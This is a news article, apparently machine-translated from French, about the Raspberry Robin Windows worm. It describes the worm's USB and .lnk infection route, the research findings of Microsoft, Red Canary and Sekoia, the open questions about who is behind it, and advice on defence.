the mysterious computer worm that threatens companies, in 5 questions


Weird malware is attracting more and more attention and concern. It targets Windows-based devices, with the ability to open a door to install other malware. His name ? Raspberry Robin, literally the robin raspberry. It was Red Canary researchers who named it after first detecting it in their clients in September 2021. The research team of the French firm Sekoia has also studied this new threat, under the less brilliant name QNAP worm.

In early July 2022, in a report identified by Bleeping Computer, Microsoft (the publisher of Windows) explained that it had itself detected hundreds of networks affected by Raspberry Robin. The American giant therefore classified the campaign [nom donné à une vague d’attaque, ndlr] malicious in the category high risk. But if the malware manages to achieve all conditions to cause potentially significant harm to its victims, researchers have so far found no signs of such activity. The mystery of this inaction casts a thick fog on the identity and intentions of the people who created and deployed it.

How does Raspberry Robin infect victims?

In jargon, Raspberry Robin falls into the category of computer worms. This term refers to the ability of malware to spread to different devices connected to a network, automatically. According to Sekoia researchers, Raspberry Robin is spreading without exploiting the vulnerabilities [des défauts logiciels, ndlr]. Specifically, turn on legitimate Windows features to switch between machines.

The first cases of infection detected by the researchers originated from connections to QNAP-branded data storage devices, infected upstream by the attackers. But since then, the latter have diversified their attack infrastructure. In particular, they use infected Internet boxes to distribute malware in Germany.

These compromised devices contain a file in .lnk [une extension utilisée pour les raccourcis Windows, ndlr], which will be activated automatically when connecting to the target computer. This file triggers Microsoft’s installer to establish an Internet connection to the attackers’ command servers, remotely located computers. This manipulation is unlikely to be detected, as Microsoft’s tool has the necessary permissions to download and run the installers.

Fortunately, the USB attack mode is relatively difficult to set up and allows you to rule out the possibility of a large-scale infection. While not all companies have policies to prevent USB drive infections, it is one of the most well-known risks and many employees are trained on the subject.

What does it do?

Raspberry Robin allows you to effectively contaminate several machines and open a backdoor to servers controlled by attackers. This access allows, in theory, to deposit other malicious software in victims or to exfiltrate information.

The problem is that at this time the researchers have not detected any use of the logins obtained by Raspberry Robin. Result, they do not know the final objective of the operation, nor the intentions of the criminals. The door is therefore open to speculation: Are the malware artisans trying to sell their access to the victims’ networks? To spy? Do they accumulate accesses to exploit them all at the same time? Many questions remained unanswered.

Who is interested?

According to Sekoia’s research team, many networks around the world are affected and have seen the malware at work “Several French networks” from the end of 2021. Red Canary experts also detected the first cases at the same time. Attackers have targeted the networks of many of their customers, particularly in the industrial and tech sectors. In early July, Microsoft in turn found Raspberry Robin in hundreds Windows networks.

However, the target of the malware is not clearly identified and the researchers found no consistency among the victims. Evaluation is all the more difficult as malicious software targets Windows systems and therefore its playing field is very large.

Who is behind Raspberry Robin?

This question remains a conundrum, as everything suggests that the person or group who deployed Raspberry Robin has not yet exploited access to infected Windows systems. As a result, researchers question the nature of malicious actors: are they just cybercriminals enjoying trying new things or are they a group of serious hackers, for example in the pay of a state? According to Sekoia, the code for the worm is quite sophisticated, who would rather go in the direction of the second option, or at least on the trail of a well-organized group of cybercriminals. But nothing is confirmed for now.

Usually, experts are able to attribute malware to this or that group of criminals by crossing the methods used, the infrastructure from which the attacks originate or even the quality of the code. In the case of Raspberry Robin, it would take more elements to analyze and more concrete actions by the attackers.

Another conundrum particularly haunts Red Canary researchers: we don’t know where and how Raspberry Robin infects storage devices (especially QNAPs) that will act as an entry point on Windows systems. This infection is likely to take place offline or at least out of our sight.researchers say.

What to do against Raspberry Robin?

There is currently no known protection mode against Raspberry Robin. It is therefore up to companies to prevent their employees from connecting suspicious USB devices to their network. A trivial measure of digital hygiene, but which is not always respected, as large networks are particularly complicated to monitor.

Once the damage is done, it’s once again unclear: Researchers don’t know exactly how difficult it is to uninstall Raspberry Robin from a machine. The malware would also distribute a file designed to resist deletion attempts.